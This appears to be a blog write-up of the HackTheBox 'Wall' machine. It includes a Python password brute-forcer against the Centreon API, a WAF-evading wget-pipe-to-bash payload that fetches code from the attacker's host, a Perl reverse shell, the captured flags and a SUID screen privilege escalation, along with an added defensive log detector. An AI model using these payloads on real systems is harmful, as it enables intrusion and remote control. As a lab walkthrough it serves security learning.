Hackthebox - Wall

Summary

Wall, a Linux box created by HackTheBox user askar, was an overall medium difficulty box. The initial foothold was finding credentials for the Centreon server, seeing that the installed version is vulnerable, and using its RCE to get a reverse shell and the user flag. Privilege escalation was very simple: after enumerating we find that screen is SUID and there is an exploit on SearchSploit for that version. Using that we get a root shell.

Enumeration

nmap

# Nmap 7.70 scan initiated Wed Sep 18 10:12:11 2019 as: nmap -sC -sV -oN nmap/wall 10.10.10.157
Nmap scan report for 10.10.10.157
Host is up (0.13s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 2e:93:41:04:23:ed:30:50:8d:0d:58:23:de:7f:2c:15 (RSA)
| 256 4f:d5:d3:29:40:52:9e:62:58:36:11:06:72:85:1b:df (ECDSA)
|_ 256 21:64:d0:c0:ff:1a:b4:29:0b:49:e1:11:81:b6:73:66 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Sep 18 10:13:03 2019 -- 1 IP address (1 host up) scanned in 52.13 seconds

We see that only ports 22 and 80 are open.
Enumerating further we find /monitoring to be interesting, but a GET request on it asks for a username and password. A POST request, however, redirects us to /centreon.

Accessing this new app we discover that Centreon version 19.04 is being used.

Searching for centreon in searchsploit we can see that this version is vulnerable to an authenticated RCE.

It looks like we need to grab some valid credentials, but the default ones (admin:centreon) do not work.

I wrote this script to brute-force the authentication.

import requests
import sys

login = 'http://10.10.10.157/centreon/api/index.php?action=authenticate'
user = "admin"
pass_list = "<wordlist>"  # path to the password wordlist


def url_request(username, password):
    """POST one credential pair to the Centreon API and return the HTTP status code."""
    data = {
        "username": username,
        "password": password
    }
    try:
        r = requests.post(login, data=data)
    except requests.exceptions.RequestException:
        print("\n\n[!] url_request: Failed to connect to %s.\n[i] Quitting." % login)
        sys.exit(-1)
    print(r.text)
    return r.status_code


def brute_force():
    # Load in wordlist file
    with open(pass_list) as f:
        passwords = f.readlines()
    # Counter
    i = 0
    # Loop around
    for PASS in passwords:
        USER = user
        PASS = PASS.rstrip('\n')
        i += 1
        print("[i] Try %s: %s::%s" % (i, USER, PASS))
        attempt = url_request(USER, PASS)
        # Check response: a failed login answers 403, anything else means a valid password
        if attempt != 403:
            print("\n\n[i] Found!")
            print("[i] Username: %s" % USER)
            print("[i] Password: %s" % PASS)
            return True
    return False


brute_force()

After a few minutes we find the valid password: password1.

Now that we have valid credentials we can try the RCE exploit. But it does not work as-is, because there is a WAF blacklisting some bash commands and some symbols (like the space character).

Every time the WAF discovers something malicious a 403 is returned.
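Both behaviours described above (the failed logins from the brute-force script and the WAF blocks) leave a trail of 403 responses in the Apache access log. The following detector, an added example that is not part of the original writeup, reads constructed access-log lines, flags any client that produces a burst of 403s inside a sliding window, and then reports clients whose burst against the authenticate endpoint was followed by a non-403 answer, which is what a password-guessing run that succeeded looks like. The sample log lines, IPs and user agents are constructed, not taken from the box.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

AUTH_PATH = "/centreon/api/index.php?action=authenticate"  # endpoint the brute-force script hits
# The fields of an Apache combined log line that the detector needs (client, time, request, status).
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')

def parse_line(line):
    """Return (ip, timestamp, method, path, status) or None for a line that is not a request record."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return m.group("ip"), ts, m.group("method"), m.group("path"), int(m.group("status"))

def find_403_bursts(lines, threshold=5, window_seconds=60):
    """Map each client IP to the time it first produced `threshold` 403s inside a sliding window.
    Failed Centreon logins and WAF blocks both answer 403, so a burst covers either behaviour.
    Lines are assumed to be in chronological order, as a live access log is."""
    recent = defaultdict(deque)
    alerts = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec[4] != 403:
            continue
        ip, ts = rec[0], rec[1]
        q = recent[ip]
        q.append(ts)
        while ts - q[0] > timedelta(seconds=window_seconds):  # drop hits outside the window
            q.popleft()
        if len(q) >= threshold and ip not in alerts:
            alerts[ip] = ts
    return alerts

def brute_force_successes(lines, **kw):
    """IPs that, after a 403 burst, later got a non-403 answer from the login endpoint."""
    alerts = find_403_bursts(lines, **kw)
    hits = set()
    for line in lines:
        rec = parse_line(line)
        if rec and rec[0] in alerts and rec[3] == AUTH_PATH and rec[4] != 403 and rec[1] > alerts[rec[0]]:
            hits.add(rec[0])
    return hits

# Constructed sample log: six rapid failures then a success from .2, one lone failed login from .9.
SAMPLE_LOG = ['10.10.14.9 - - [18/Sep/2019:10:30:00 +0000] "GET /centreon/ HTTP/1.1" 200 5123 "-" "Mozilla/5.0"'] + [
    f'10.10.14.2 - - [18/Sep/2019:10:30:0{s} +0000] "POST {AUTH_PATH} HTTP/1.1" 403 31 "-" "python-requests/2.22.0"'
    for s in range(1, 7)
] + [
    f'10.10.14.2 - - [18/Sep/2019:10:30:07 +0000] "POST {AUTH_PATH} HTTP/1.1" 200 94 "-" "python-requests/2.22.0"',
    f'10.10.14.9 - - [18/Sep/2019:10:31:10 +0000] "POST {AUTH_PATH} HTTP/1.1" 403 31 "-" "Mozilla/5.0"',
    "not a log line",
]
```

Run `find_403_bursts(SAMPLE_LOG)` to get the burst time per client and `brute_force_successes(SAMPLE_LOG)` to see which of those clients later logged in; tune `threshold` and `window_seconds` to the login rate you expect from real users.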

After playing around with the exploit i was able to get it working.

payload = """wget${{IFS}}-qO-${{IFS}}http://{0}:8888/payload.sh${{IFS}}|${{IFS}}bash;""".format(ip, port)

Changing the payload to the above makes the exploit script do a GET request to our machine and fetch payload.sh, which contains a reverse shell:

perl -e 'use Socket;$i="10.10.X.X";$p=53;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Trying that, we see the GET request arrive on our machine, but no shell comes back.

This can mean there is a firewall preventing the shell from reaching us. Trying some common ports, we get a reverse shell back on port 53, which the firewall allows.

We get the connection back and can read user.txt:

fe6194544f452f62dc905b12f8da8406

Privilege Escalation

Running LinEnum.sh we see that /bin/screen-4.5.0 is present and is a SUID binary.

Searching searchsploit we find an exploit for this version.

Using that we get root on the box

and we can read root.txt: 1fdbcf8c33eaa2599afdc52e1b4d5db7

and we have pwned Wall 💃

Author: Shubham Kumar
Link: https://f3v3r.in/htb/machines/retired/wall/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless otherwise stated.